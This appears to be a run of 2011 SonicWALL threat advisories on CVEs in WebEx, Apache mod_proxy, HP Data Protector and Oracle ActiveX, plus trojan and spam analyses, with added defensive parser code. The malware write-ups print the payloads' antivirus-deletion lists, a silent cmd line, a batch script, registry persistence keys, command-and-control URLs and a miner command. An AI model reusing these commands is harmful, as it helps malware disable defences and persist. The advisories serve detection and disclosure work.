Cisco WebEx Player Remote Code Execution (Dec 8, 2011)

WebEx Communications Inc. is a Cisco company that provides on-demand collaboration, online meeting, web conferencing and videoconferencing applications. Its products include Meeting Center, Training Center, Event Center, Support Center, Sales Center, MeetMeNow, PCNow, WebEx AIM Pro Business Edition, WebEx WebOffice, WebEx Connect and WebEx Player.

Cisco WebEx uses the proprietary WRF file format (.wrf extension) to store WebEx meeting recordings on the computer of an online meeting attendee. The structure of this file is not publicly documented. Reverse-engineering has identified the following structure as the file header:

    Offset  Size  Field
    ------  ----  -----------------------------------
    0x00    4     Magic number = 57 4f 54 46 (WOTF)
    0x04    4     Unknown
    0x08    4     File size in bytes

After the header, there may be multiple records in the file. The records may have the following format:

    Offset  Size  Field
    ------  ----  -------------------
    0x00    1     Field type
    0x01    4     Size of the record
    0x05    m     Unknown
    0xXX    4     Data size (n)
    0xXX    n     Data

A code execution vulnerability exists in the Cisco WebEx Player ATA32.dll module. The vulnerable code trusts the data read from the records of a WRF file, uses it to determine the size and the offset of the source/destination buffer for a memcpy call, and then overwrites memory with data taken from the file.
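As an added example (not code from the advisory or from Cisco), the following Python parser walks the header and record layout above and refuses any size or offset that does not fit in the bytes actually read, which is the check the vulnerable memcpy path lacked. The byte order (little-endian) and the length of the undocumented gap m are assumptions.

```python
import struct

WRF_MAGIC = b"WOTF"
HEADER_LEN = 12        # magic (4) + unknown (4) + file size (4)
# Assumed length of the undocumented gap between the record-size and
# data-size fields; the advisory only calls it "m". Adjust if known.
RECORD_GAP_LEN = 4


class WrfError(ValueError):
    """Raised when a size or offset read from the file does not fit the file."""


def parse_wrf(buf, gap_len=RECORD_GAP_LEN):
    """Walk the header and records, returning [(field_type, data), ...].

    Every size read from the file is checked against the bytes actually
    present before it is used as a length or offset. Little-endian byte
    order is an assumption; the advisory does not state it."""
    if len(buf) < HEADER_LEN:
        raise WrfError("truncated header")
    magic, _unknown, file_size = struct.unpack_from("<4sII", buf, 0)
    if magic != WRF_MAGIC:
        raise WrfError("bad magic")
    if file_size != len(buf):
        raise WrfError("declared file size %d, actual %d" % (file_size, len(buf)))
    fixed = 1 + 4 + gap_len + 4   # bytes before the variable-length data
    records = []
    off = HEADER_LEN
    while off < len(buf):
        if len(buf) - off < fixed:
            raise WrfError("truncated record at 0x%x" % off)
        field_type = buf[off]
        (rec_size,) = struct.unpack_from("<I", buf, off + 1)
        # The record must hold its own fixed part and end inside the buffer.
        if rec_size < fixed or rec_size > len(buf) - off:
            raise WrfError("record size %d out of bounds at 0x%x" % (rec_size, off))
        (data_size,) = struct.unpack_from("<I", buf, off + 1 + 4 + gap_len)
        # The data must fit inside the record that claims to contain it.
        if data_size > rec_size - fixed:
            raise WrfError("data size %d exceeds record at 0x%x" % (data_size, off))
        start = off + fixed
        records.append((field_type, bytes(buf[start:start + data_size])))
        off += rec_size
    return records


def rejects(buf):
    """True if parse_wrf refuses the buffer (used to exercise the checks)."""
    try:
        parse_wrf(buf)
    except WrfError:
        return True
    return False


def build_wrf(records, gap_len=RECORD_GAP_LEN):
    """Build a well-formed file from [(field_type, data), ...] (constructed sample)."""
    body = b""
    for field_type, data in records:
        fixed = 1 + 4 + gap_len + 4
        body += (bytes([field_type]) + struct.pack("<I", fixed + len(data))
                 + b"\0" * gap_len + struct.pack("<I", len(data)) + data)
    return WRF_MAGIC + struct.pack("<II", 0, HEADER_LEN + len(body)) + body


def with_data_size(buf, record_off, new_size, gap_len=RECORD_GAP_LEN):
    """Copy of buf with the data-size field of the record at record_off overwritten."""
    out = bytearray(buf)
    struct.pack_into("<I", out, record_off + 1 + 4 + gap_len, new_size)
    return bytes(out)
```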

A remote unauthenticated attacker can exploit this vulnerability to inject and execute arbitrary code with the privileges of the currently logged on user. If code execution fails, the vulnerable application will terminate abnormally.

SonicWALL UTM team has researched this vulnerability and released the following IPS signature to detect attacks targeting it:

  • 7202 Cisco WebEx Player Remote Code Execution

This vulnerability has been assigned CVE-2011-4004.

Apache HTTPD mod_proxy Security Bypass (Dec 2, 2011)

The Apache HTTP Server, commonly referred to as Apache, is web server software notable for playing a key role in the initial growth of the World Wide Web. In 2009 it became the first web server software to surpass the 100 million website milestone. The server is capable of being utilized with many different options and configurations. A wide variety of runtime loadable plug-in modules can be used to extend its functionality.

One of the official plug-in modules is mod_proxy. Like all other modules, it can be compiled as a separate shared library with a “.so” extension. The purpose of this module is to let the Apache HTTP server act as a forward or reverse proxy for FTP, HTTP, and HTTPS. The proxy functionality is turned on by its configuration directives. Users typically send an HTTP request to the web server, which then forwards it to the appropriate backend server.

HTTP is the request/response protocol spoken by the HTTP server. HTTP uses Uniform Resource Identifiers (URIs) to locate web pages. A typical HTTP request with a URI is shown below:

    GET /test/index.html HTTP/1.1
    HOST: www.example.com

A policy bypass vulnerability exists in the Apache HTTP server. The vulnerability is due to a design weakness in the reverse proxy module mod_proxy when it is configured in a specific manner. In this case the code may fail to sufficiently sanitize the Request-URI of an HTTP request. As a result, an internal web server that should not be reachable by external users can be accessed through the reverse proxy.
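The weak configuration behind CVE-2011-3368 is a proxy rule such as RewriteRule ^(.*) http://backend$1 [P] or ProxyPassMatch ^(.*) http://backend$1, which forwards the raw Request-URI; a Request-URI that does not begin with a slash then lets the client pick the destination host. As an added example (not part of the SonicWALL advisory or of Apache), this Python code classifies request lines the way a reverse proxy should before proxying, and audits configuration lines for patterns that are not anchored on a leading slash; the sample configuration is constructed.

```python
import re

# Request-URI forms RFC 2616 allows on a request line.
_ABS_PATH = re.compile(r"^/\S*$")
_ABSOLUTE_URI = re.compile(r"^(?:https?|ftp)://[^\s/?#]+(?:[/?#]\S*)?$", re.I)
_AUTHORITY = re.compile(r"^[A-Za-z0-9.\-]+(?::\d+)?$")   # host[:port], CONNECT only


def request_uri_form(method, uri):
    """Classify a Request-URI as 'abs_path', 'absolute_uri', 'authority',
    'asterisk' or 'malformed'."""
    if uri == "*":
        return "asterisk"
    if _ABS_PATH.match(uri):
        return "abs_path"
    if _ABSOLUTE_URI.match(uri):
        return "absolute_uri"
    if method.upper() == "CONNECT" and _AUTHORITY.match(uri):
        return "authority"
    return "malformed"


def check_reverse_proxy_request(line):
    """Return (form, accepted). A reverse proxy should only forward abs_path
    requests; anything else is refused before a rewrite rule can prepend a
    backend URL to it."""
    parts = line.rstrip("\r\n").split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return ("malformed", False)
    form = request_uri_form(parts[0], parts[1])
    return (form, form == "abs_path")


def rewrite_pattern_is_anchored(pattern):
    """A pattern must start with a literal '/' (e.g. '^/(.*)') so that only
    absolute-path Request-URIs can reach the backend; '^(.*)' captures
    whatever the client sent."""
    return pattern.startswith("^/")


def audit_proxy_rules(config_lines):
    """Return the RewriteRule [P] / ProxyPassMatch lines whose pattern is not
    anchored on a leading slash."""
    findings = []
    rule = re.compile(r"^(RewriteRule|ProxyPassMatch)\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?")
    for line in config_lines:
        stripped = line.strip()
        m = rule.match(stripped)
        if not m:
            continue
        directive, pattern, _target, flags = m.groups()
        if directive == "RewriteRule":
            is_proxy = flags and any(f.strip().lower() in ("p", "proxy")
                                     for f in flags.split(","))
            if not is_proxy:
                continue   # internal rewrite, not a proxy rule
        if not rewrite_pattern_is_anchored(pattern):
            findings.append(stripped)
    return findings


# Constructed sample configuration: two weak rules and one corrected rule.
SAMPLE_CONFIG = [
    "RewriteEngine On",
    "RewriteRule ^(.*) http://backend.example$1 [P]",
    "RewriteRule ^/(.*) http://backend.example/$1 [P]",
    "ProxyPassMatch ^(.*) http://backend.example$1",
    "RewriteRule ^(.*) /index.html [L]",
]
```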

SonicWALL UTM team has researched this vulnerability and released the following IPS signatures:

  • 3105 Apache HTTPD mod_proxy Security Bypass 1
  • 3132 Apache HTTPD mod_proxy Security Bypass 2

This vulnerability has been assigned CVE-2011-3368.

Trojan uses Rootkit remover tool to disable Anti-virus (Dec 1, 2011)

The SonicWALL UTM research team received reports of a new KillAV Trojan in the wild. This Trojan uses a rootkit remover tool called The Avenger. According to the home page of this tool, “The Avenger is a fully-scriptable, kernel-level Windows driver designed to remove highly persistent files, registry keys/values, and other drivers protected by entrenched malware”. Ironically, the Trojan uses this anti-malware tool to remove files belonging to a variety of well-known anti-virus products from vendors such as AVG, Kaspersky and Symantec. Most anti-virus software protects its files from user-mode removal. However, it is very hard to protect such files from kernel-mode attacks.

The Trojan uses the following icon:

The Trojan adds the following files to the filesystem:

  • C:\DRIVERS10\KDESCK.exe [Avenger executable]
  • C:\DRIVERS10\TDESCK.txt [Avenger file instructions]
  • C:\WINDOWS\system32\eihs.txt [Avenger file instructions]
  • C:\DRIVERS10\WINNTK.exe [Detected as GAV: KillFiles.NEK (Trojan)]
  • C:\cleanup.exe [Detected as GAV: Zapchast.M (Trojan)]
  • C:\cleanup.bat [Cleanup instructions]
  • C:\zip.exe [Zip utility]
  • C:\WINDOWS\system32\drivers\tsfqiza.sys [Avenger kernel-mode driver]

TDESCK.txt contains the following information:

      Folders to delete:
      %ProgramFiles%\AVG
      %ProgramFiles%\Panda Security
      %ProgramFiles%\ESET
      %ProgramFiles%\KASPER~1
      %ProgramFiles%\Avira
      %ProgramFiles%\Softwin
      %ProgramFiles%\Grisoft
      %ProgramFiles%\NORTON~1
      %ProgramFiles%\Microsoft Security Client
      Files to move:
      %ProgramFiles%\Alwil Software\Avast5\AvastUI.exe|%ProgramFiles%\Alwil Software\Avast5\AvastUI.exa
      %ProgramFiles%\Alwil Software\Avast5\AvastSvc.exe|%ProgramFiles%\Alwil Software\Avast5\AvastSvc.exa
      %ProgramFiles%\AVAST Software\Avast\AvastSvc.exe|%ProgramFiles%\AVAST Software\Avast\AvastSvc.exa
      %ProgramFiles%\AVAST Software\Avast\AvastUI.exe|%ProgramFiles%\AVAST Software\Avast\AvastUI.exa

The above information instructs the Avenger software to remove or move files and directories belonging to various anti-virus software.

Upon infection, the following command is run to remove the anti-virus files listed above in TDESCK.txt. This command runs Avenger invisibly without its GUI:

      cmd /c C:\DRIVERS10\KDESCK.exe /nogui C:\DRIVERS10\TDESCK.txt

cleanup.bat contains the following information:

      @ECHO OFF
      cd %systemdrive%
      if exist %systemdrive%\avenger\backup.zip move /y %systemdrive%\avenger\backup.zip "%systemdrive%\avenger\backup-%date:/=.%-%time::=.%.zip"
      move /y backup.reg %systemdrive%\avenger
      copy /y avenger.txt %systemdrive%\avenger
      for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%a:\avenger attrib -r -h -s %%a:\avenger\* /S /D & zip -r -S -q -m -! -P infected "%systemdrive%\avenger\backup.zip" %%a:\avenger\* -x %systemdrive%\avenger\backup*.zip & rmdir %%a:\avenger
      del zip.exe
      del cleanup.exe
      del cleanup.bat

The Trojan adds the following keys to the Windows registry to install the Avenger kernel-mode driver and run WINNTK.exe and cleanup.exe after reboot:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run: Microsoft Windows Debug = “C:\DRIVERS10\WINNTK.exe”
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce: Cleanup = “C:\cleanup.exe”
  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mmjnbxj: ImagePath = “C:\WINDOWS\system32\drivers\tsfqiza.sys”
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mmjnbxj: cvva = “C:\WINDOWS\system32\eihs.txt”

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: KillFiles.NEK (Trojan)
  • GAV: Zapchast.M (Trojan)

UPS Invoice Notification spam campaign (Nov. 23, 2011)

With the holiday season approaching, the SonicWALL UTM Research team has observed a surge in online threats. Reports of an email spam campaign carrying a malware attachment and pretending to come from United Parcel Service (UPS) continue to flood email inboxes.

Computer users are advised to exercise caution when opening unsolicited emails, especially from unknown senders. UPS has also hosted a presentation to raise awareness about UPS-related scams.

The behavior of this malware is further discussed below:

Subject: United Parcel Service – Invoice is available [random numbers]

Attachment: UPS-Billing-Invoice-Notification-[random numbers].zip

Message Body:

    UPS Billing Center

    This is an automatically generated email. Please do not reply to this email address.

    Dear UPS Customer,

    A new invoice is now available in the UPS Billing Centre.
    Please refer to attached file for more details

    Please visit the UPS Billing Centre to view and pay your invoice.

    Coming Soon!
    Effective January 2012, the UPS Billing Centre can be accessed using your My UPS ID.
    Current UPS Billing Centre users will be prompted to convert to a My UPS ID. Learn more

    Discover more about UPS:
    Visit ups.com
    Explore UPS Freight Services
    Learn About UPS Companies
    Sign Up For Additional Email From UPS
    Read Compass Online

    (c) 2011 United Parcel Service of America, Inc., the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
    For more information on UPS’s privacy practices, refer to the UPS Privacy Policy.
    Please do not reply directly to this e-mail. UPS will not receive any reply message.
    For questions or comments, visit Contact UPS.

    This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
    Privacy Policy
    Contact UPS

If the user downloads and executes the malicious executable inside the zip attachment, it performs the following activity:

Files Created:

  • Application DataSomonekpos.exe – copy of original malware – blocked as GAV:Kryptik.VUY
  • Application DataAfisaawqide.myx – data file
  • Application DataAfisaawqide.dat – data file

Harvests email addresses from:

  • Microsoft Address Book
  • Internet Browser Cookies

Checks for installed FTP clients:

  • FlashFXP
  • Ghisler\Total Commander
  • ipswitch\ws_ftp
  • Far\Plugins\ftp\hosts
  • Far2\Plugins\ftp\hosts
  • martin prikryl\winscp 2\sessions
  • ftpware\coreftp\sites
  • smartftp\client 2.0\settings\general\favorites

Network Activity:

    DNS Request: nos{removed}n.ru

    Post Request: http://nos{removed}n.ru/become.php

Virtual Machine Detection:

    Key: HKLM\System\CurrentControlSet\Services\Disk\Enum
    Value: 0
    Data:

    • IDE\DiskVMware_Virtual_IDE_Hard_Drive
    • IDE\DiskVBOX_HARDDISK

VNC Server Detection:

    Tries to connect to a VNC server and waits for the following response:

  • RFB 003.003

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

GAV:Kryptik.VUY (Trojan)

HP Data Protector Information Disclosure (Nov 23, 2011)

HP Data Protector Media Operations facilitates tracking and management of storage media, as well as data recovery. It tracks online and offline media such as magnetic tapes. HP Data Protector Media Operations includes an administration GUI which can be installed on multiple hosts allowing several administrators to manage Media Operations.

The communication protocol utilized by the server and its clients is proprietary and not publicly documented. The default communication port for the server is TCP 19813. Messages to the server have the following structure:

    Offset  Size (bytes)  Description
    ------  ------------  ----------------
    0x0000  1             Opcode
    0x0001  3             Unknown
    0x0004  4             Record size (x)
    0x0008  4             Unknown
    0x000C  x             Record data

All multi-byte values are represented in big endian byte order. Several records are usually transferred together in a single packet. Sub records are contained in the record data field of a record structure. Records having an Opcode of 0x03, and a size value greater than four, have the following sub record structure:

    Offset  Size (bytes)  Description
    ------  ------------  ----------------
    0x0000  4             Opcode
    0x0001  1             Record size (y)
    0x0004  y             Filename

Sub records of the above form are possible file requests, which cause the server to return the contents of the file specified in the filename field. The file path resolves relative to the base directory of the server. This base directory is configurable upon product installation. If the record size of a 0x03 record is of a certain specific value, the request is interpreted as a directory listing request, and the contents of the base directory are returned to the client.

An information disclosure vulnerability exists in HP Data Protector, when handling file requests. The process retrieves the filename and appends it to the base directory without any sanitization. As such, directory traversal sequences can be used to traverse to any file on the filesystem. Consequently, the contents of any file will be returned to the client that initiated the file request. A remote, unauthenticated attacker could exploit this vulnerability to obtain confidential information that could be later utilized to compromise other resources.
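As an added example (not code from the advisory or from HP), this Python code walks the big-endian record structure above with bounds checks and shows the containment check the server should apply before appending a client-supplied filename to its base directory. The base directory and packet used are constructed samples, and the sub-record layout is not parsed because the advisory's offsets for it are ambiguous.

```python
import posixpath
import re
import struct

# Record header: opcode (1), unknown (3), record size x (4), unknown (4); big endian.
RECORD_HDR = struct.Struct(">B3sI4s")
FILE_REQUEST_OPCODE = 0x03


def iter_records(packet):
    """Yield (opcode, data) for each record in a packet, checking every size
    field against the bytes actually received before slicing."""
    off = 0
    while off < len(packet):
        if len(packet) - off < RECORD_HDR.size:
            raise ValueError("truncated record header at %d" % off)
        opcode, _u1, size, _u2 = RECORD_HDR.unpack_from(packet, off)
        end = off + RECORD_HDR.size + size
        if end > len(packet):
            raise ValueError("record size %d runs past packet at %d" % (size, off))
        yield opcode, packet[off + RECORD_HDR.size:end]
        off = end


def records_ok(packet):
    """True if every record in the packet is well-formed."""
    try:
        list(iter_records(packet))
    except ValueError:
        return False
    return True


def build_record(opcode, data):
    """Constructed sample record; unknown fields zeroed."""
    return RECORD_HDR.pack(opcode, b"\0" * 3, len(data), b"\0" * 4) + data


class TraversalError(ValueError):
    """The requested filename would resolve outside the base directory."""


def resolve_under_base(base_dir, filename):
    """Join a client-supplied filename to the server base directory and refuse
    anything that escapes it. Backslashes are treated as separators (the
    server runs on Windows); drive letters, UNC/absolute paths and NUL bytes
    are rejected; '..' is resolved before the containment check. An empty
    filename resolves to the base directory itself (a listing request)."""
    if "\x00" in filename:
        raise TraversalError("NUL byte in filename")
    rel = filename.replace("\\", "/")
    if rel.startswith("/") or re.match(r"^[A-Za-z]:", rel):
        raise TraversalError("absolute path not allowed")
    base = posixpath.normpath(base_dir.replace("\\", "/"))
    resolved = posixpath.normpath(posixpath.join(base, rel))
    if resolved != base and not resolved.startswith(base + "/"):
        raise TraversalError("path escapes base directory: %r" % filename)
    return resolved


def is_allowed(base_dir, filename):
    """True if the filename stays inside base_dir."""
    try:
        resolve_under_base(base_dir, filename)
    except TraversalError:
        return False
    return True
```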

SonicWALL has released a generic IPS signature to address this issue. The following signature was released:

  • 7175 – HP Data Protector Media Operations Directory Traversal Attempt.

Ngrbot steals information and mines Bitcoins (Nov 18, 2011)

The SonicWALL UTM Research team discovered Ngrbot spreading in the wild. The bot steals user information and spreads through malicious links, removable drives, instant messengers and social networks. After the initial infection, it downloads additional modules, including a Bitcoin mining module. Bitcoin is a form of digital currency, and one way of obtaining it is by mining. Mining for Bitcoins is a computationally expensive process involving a great deal of hashing, which makes it time-consuming and impractical on a single personal computer. The creators of this botnet have found a lucrative alternative for generating Bitcoins by leveraging the CPU cycles of infected machines.

Ngrbot uses misleading filenames with explicit icons as shown below:

screenshot

It performs the following activities:

  • It determines geoip details by sending a request to api.wipmania.com.
  • It contacts a remote C&C server to report infection and receive additional commands.
  • It downloads additional modules from a remote file hosting server.
  • It drops the following files:
    • %AppData%\9.exe [Detected as Injector.KSW_2 (Trojan) ]
    • %AppData%\A.exe (Corrupted file)
    • %AppData%\kakao3\fuckHDZSDP.exe [Detected as Ngrbot.GEN_3 (Worm) ]
    • %AppData%\kakao3\new.exe [Detected as BtcMiner (Trojan) ]
    • %AppData%\Xkagad.exe (Copy of itself) [Detected as Ngrbot.GEN_3 (Worm) ]
    • Start Menu\Programs\Startup\newmoon17.exe [Detected as Injector.KSW_3 (Trojan) ]
  • It ensures persistence of infection across reboots:
    • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run: Xkagad: ”%AppData%\Xkagad.exe”
    • Creates startup file Start Menu\Programs\Startup\newmoon17.exe
  • It has the following information stealing modules:
    • popgrab
    • ftpgrab
    • ffgrab
    • iegrab
  • It has the ability to perform DoS (Denial of Service) attacks.
  • It blocks access to various antivirus and security websites by intercepting DNS.
  • It uses form grabbers to steal credentials from the following URLs:
      screenshot

  • It has the ability to spread through MSN messenger and removable drives. It also has the ability to post to Bebo, Friendster, Vkontakte, Twitter and Facebook.
  • It attempts to load “nvcuda.dll” (Nvidia CUDA), if present, to mine Bitcoins on the GPU (Graphics Processing Unit).
  • It kills all previous Bitcoin mining infections:
      screenshot

  • It mines for Bitcoins at 59 second intervals by executing the following command:
      mine.exe -a 59 -o http://{removed}.org:8332/ -u darksons_crypt -p pt

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: Ngrbot.GEN (Worm)
  • GAV: Ngrbot.GEN_3 (Worm)

screenshot

This threat is also classified as “Dorkbot.A (Worm)” by some vendors.

Oracle Hyperion ActiveX BO (Nov 18, 2011)

Oracle’s Hyperion is composed of various business performance management and business intelligence software products. The Hyperion Financial line of products includes financial reporting and analysis components. Installing Hyperion Financial on Windows systems results in the installation of several ActiveX controls, one of which is named TTF16.ocx. This ActiveX control is associated with CLSID B0475003-7740-11D1-BDC3-0020AF9F8E6E and ProgID TTF161.TTF1.6. The control is marked as scriptable, and as such can be instantiated from a web page by using the <object> tag or through scripting. The following snippets show how the control can be instantiated:

    <object classid="clsid:B0475003-7740-11D1-BDC3-0020AF9F8E6E"></object>

Or

    var ctrl = new ActiveXObject("TTF161.TTF1.6");

The TTF161.TTF1.6 control exposes several methods, one of which is a method named SetDevNames, which is used to set the default printer. An example code snippet illustrating the use of this function is shown:

    SetDevNames('drivername', 'devicename', 'port')

A code execution vulnerability exists in Oracle’s Hyperion Financial TTF161.TTF1.6 ActiveX control. The vulnerability is a heap buffer overflow during execution of the SetDevNames method. The method allocates a heap buffer whose size is determined by the number of characters in the given arguments. It then converts the parameters into Unicode strings, which doubles their size, and copies the Unicode strings into the allocated buffer. If any of the three parameters is a non-empty string, a heap buffer overflow occurs.

In order to exploit this vulnerability, the attacker needs to entice the target user to visit a malicious web page. Any code execution resulting from exploitation will occur in the security context of the currently logged-in user. An unsuccessful code execution attempt may result in abnormal termination of the web browser.

SonicWALL has released an IPS signature that detects and blocks exploitation attempts targeting this vulnerability. The following signature has been released:

  • 7161 – Oracle Hyperion Strategic TTF16 ActiveX Buffer Overflow

Rejected Federal Tax payment spam campaign (Nov 10, 2011)

The SonicWALL UTM Research team observed a new spam campaign pretending to come from the IRS information center. It informs the user about a rejected Federal Tax payment and asks them to review the attached PDF report for more information. The attached file is a malicious executable Trojan masquerading as a PDF file.

A sample e-mail message looks like:

screenshot

The attached report file looks like:

screenshot

If executed, the file performs the following activity:

  • Creates a process svchost.exe and injects code into it.
  • Connects to public Google DNS Server 8.8.4.4 to check for Internet connectivity and sends DNS queries to it for a list of predetermined remote servers:
    • followmego12.ru
    • hidemyfass87111.ru
    • losokorot7621.ru
    • mamtumbochka766.ru

  • Reports the infected machine’s information to one of the above mentioned servers via POST request:

    screenshot

    The decrypted version of the data being sent looks like “id:8(REMOVED)|bid:X|bv:XXX|sv:XXXX|la:X”

  • It further attempts to download malicious executable files from a remote server in Latvia:
    • 91.22(REMOVED).29/step.exe [Detected as GAV: Pakes.II_2 (Trojan)]
    • 91.22(REMOVED).29/spm.exe [Detected as GAV: Festi.C_3 (Trojan)]
  • Drops the following files:
    • (All Users Temp)\5328ffb60049acd7.exe [Copy of itself, detected as GAV: Pakes.QUJ (Trojan)]
    • (User Temp)\uhbgmrxgvk.bat [Batch file to remove the previous version]
  • Deletes the original copy of the file.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Pakes.QUJ (Trojan)
  • GAV: Festi.C_3 (Trojan)
  • GAV: Pakes.II_2 (Trojan)

Microsoft Security Bulletin Coverage (Oct 11, 2011)

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of October, 2011. A list of issues reported, along with SonicWALL coverage information follows:

MS11-075 Vulnerability in Microsoft Active Accessibility Could Allow Remote Code Execution (2623699)

  • CVE-2011-1247 Active Accessibility Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt

MS11-076 Vulnerability in Windows Media Center Could Allow Remote Code Execution (2604926)

  • CVE-2011-2009 Media Center Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt

MS11-077 Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2567053)

  • CVE-2011-1985 Win32k Null Pointer De-reference Vulnerability
    This is a local vulnerability.
  • CVE-2011-2002 Win32k TrueType Font Type Translation Vulnerability
    There is no feasible method of detection.
  • CVE-2011-2003 Font Library File Buffer Overrun Vulnerability
    IPS: 2252 – Malformed OpenType Font 10b
  • CVE-2011-2011 Win32k Use After Free Vulnerability
    There is no feasible method of detection.

MS11-078 Vulnerability in .NET Framework and Microsoft Silverlight Could Allow Remote Code Execution (2604930)

  • CVE-2011-1253 Class Inheritance Vulnerability
    GAV: MsApp.Exp.MP.1

MS11-079 Vulnerabilities in Microsoft Forefront Unified Access Gateway Could Cause Remote Code Execution (2544641)

  • CVE-2011-1895 ExcelTable Response Splitting XSS Vulnerability
    IPS: 2418 – ExcelTable Code Injection 1
  • CVE-2011-1896 ExcelTable Reflected XSS Vulnerability
    IPS: 2419 – ExcelTable Code Injection 2
  • CVE-2011-1897 Default Reflected XSS Vulnerability
    IPS: 2300 – Generic Cross-Site Scripting (XSS) Attempt 24
  • CVE-2011-1969 Poisoned Cup of Code Execution Vulnerability
    IPS: 2420 – Generic Java Applet Exploit 3
  • CVE-2011-2012 Null Session Cookie Crash
    IPS: 2258 – Suspicious HTTP Cookie Header 3

MS11-080 Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799)

  • CVE-2011-2005 Ancillary Function Driver Elevation of Privilege Vulnerability
    This is a local vulnerability.

MS11-081 Cumulative Security Update for Internet Explorer (2586448)

  • CVE-2011-1993 Scroll Event Remote Code Execution Vulnerability
    IPS: 7029 – MS IE Scroll Event Remote Code Execution Exploit
  • CVE-2011-1995 OLEAuto32.dll Remote Code Execution Vulnerability
    IPS: 7028 – MS IE OLEAuto32.dll Remote Code Execution Exploit
  • CVE-2011-1996 Option Element Remote Code Execution Vulnerability
    IPS: 7027 – MS IE Option Element Remote Code Execution Exploit
  • CVE-2011-1997 OnLoad Event Remote Code Execution Vulnerability
    IPS: 7026 – MS IE OnLoad Event Remote Code Execution Exploit
  • CVE-2011-1998 Jscript9.dll Remote Code Execution Vulnerability
    IPS: 7025 – MS IE Jscript9.dll Remote Code Execution Exploit
  • CVE-2011-1999 Select Element Remote Code Execution Vulnerability
    IPS: 7024 – MS IE Select Element Remote Code Execution Exploit
  • CVE-2011-2000 Body Element Remote Code Execution Vulnerability
    IPS: 7022 – MS IE Body Element Remote Code Execution Exploit
  • CVE-2011-2001 Virtual Function Table Corruption Remote Code Execution Vulnerability
    IPS: 7021 – MS IE Virtual Function Table Corruption Exploit

MS11-082 Vulnerabilities in Host Integration Server Could Allow Denial of Service (2607670)

  • CVE-2011-2007 Endless Loop DoS in snabase.exe Vulnerability
    IPS: 5012 – Generic UDP Shellcode Exploit 2
  • CVE-2011-2008 Access of Unallocated Memory DoS Vulnerability
    IPS: 4896 – Generic Server Application Shellcode Exploit 9
    IPS: 5512 – Generic Server Application Shellcode Exploit 28
    IPS: 6701 – MS Host Integration Server DoS

Android Malware stealing user information (Oct 14, 2011)

The SonicWALL UTM Research team received reports of a new AndroidOS malware, Neflic, masquerading as the Netflix application; it steals information from the user and sends it to a remote server. The server had been taken down at the time of writing this alert.

The malware author, in this case, took advantage of the popularity of the Netflix mobile application and its lack of availability across all Android OS versions. The malicious application looks very similar to the official Netflix Android application and steals the user’s account information before deleting itself. Below are screenshots of the malicious application in action:

Installation Screen

    screenshot

Login Screen comparison – Fake (on left) & Real (on right)

    screenshot

Once the user enters the login credentials, it will send the information to a remote server and generate a fake “Your Android TV is not supported” prompt as seen below:

    screenshot

Code snippet showing the malicious server (offline now) where the stolen information was being logged:

    screenshot

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: AndroidOS.neflic (Trojan)
  • GAV: AndroidOS.neflic_2 (Trojan)
